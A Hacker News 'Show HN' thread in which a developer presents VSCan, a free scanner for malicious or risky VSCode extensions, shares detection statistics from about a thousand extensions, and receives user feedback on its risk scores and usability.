alt Hacker NewsShow HN: VSCan - Detect Malicious VSCode Extensions
Did you know that VSCode extensions run with full access to your system—including file system, network, and credentials? Worse, dozens of malicious extensions have already made it into the marketplace, silently compromising devices.
I am a security researcher and student developer who ran into this problem myself. To help tackle this, I built a 100% free tool (no login required) that scans VSCode (and Cursor/Windsurf) extensions for:
- Hidden malware and obfuscated code
- Dangerous permissions and API misuse
- Vulnerable dependencies and suspicious network connections
Users have already found hundreds of vulnerabilities in extensions. VSCan generates a clean, developer-friendly security report to help you understand what you're installing.
Try it out: https://www.vscan.dev
I have also developed custom sandboxing security architecture to restrict extensions from malicious activity during runtime. There is no existing technology that does this, so if you would be interested in trying it out or learning more, please reach out!
I would greatly appreciate any feedback and thanks for your help!
_______________________________________________________________________________
Here are some numbers as to what I have detected from a sample of 1077 extensions that are available on the Marketplace:
- 3 extensions are marked as malicious by VirusTotal - 7 extensions use malicious network connections (verified by VirusTotal) - 33 extensions have dependencies with critical vulnerabilities - 39 extensions have sensitive information (I have seen api keys, usernames, passwords, etc.) - 204 extension have poor development practices as marked by OSSF - 71 extensions have very high permissions (while not bad can be indicator of potential malicious activity)
As an example here is the link to an extension analysis with malicious network endpoints: https://vscan.dev/?analysisId=9e6c1849-3973-402b-a4ff-3b4023...
Comments
You should definitely show the vulnerabilities you found on the front page, instead of showcasing low scores given to popular extensions. Claiming that "rust-analyzer" is "High Risk" is a strong turn-off from me thinking your service is useful (why? because it contains shell commands in the form of "taskDefinitions", and because it uses a dependency to parse ANSI sequences that hasn't received a commit in the past 90 days).
Nice work! This has actually been an open feature request since 2018 [0]. I've been wanting something like this for a while.
I'd love a version of this where I can paste my full list of extensions, instead of a box where I can only paste one. The latter is tedious, so I'm not that likely to do it.
A lot of directions you could take this. Free/Commercial. Thoughts?
Would be interesting to get more details on the sandbox.
i wish the detail links on each analysis tile were real links, instead of some apparently weird javascript. seems broken in firefox
it would also be nice if i could expand all the analysis detail at once, instead of just one section at a time.
I applaud the idea and love that you made this freely available without bolting on a SaaS subscription on top of it.
However, I always roll my eyes when I see high severity risk in dependency chains due to ReDoS vulnerabilities. Sure, it matters for a web server maybe, but code running in a CLI tool, browser app, VSCode extension, or even a serverless lambda runtime really won't be affected much. More often than not, I find the `npm audit` risk classifications to be nonsense.
That's concerning. What is Microsoft doing about it? Have you contacted them?
vscodevim got 71/100 high risk. That's a pretty common one.
Finally we have something like this. This is very good work
Using this is kind of a pain in the butt (looking thru all installed extensions and pasting in the raw name one by one). Could this be packaged as an extension itself, that scans other extensions? Or provide a CLI command to export all of your installed extensions as a list, which you can then upload? Or better, a one liner that will export your extensions to stdin, POST them to your API, and it will return a URL that you can click and load in the browser to explore the breakdown of (potential) issues.
It is beyond madness and well into "intentionally negligent" to release a plugin system without a permissions model in, like, the last 20 years. Can't believe people aren't up in arms about how wide open vscode and similar things are, particularly now that docker is widespread.
Thanks for building a scanner! I wish it wasn't necessary :/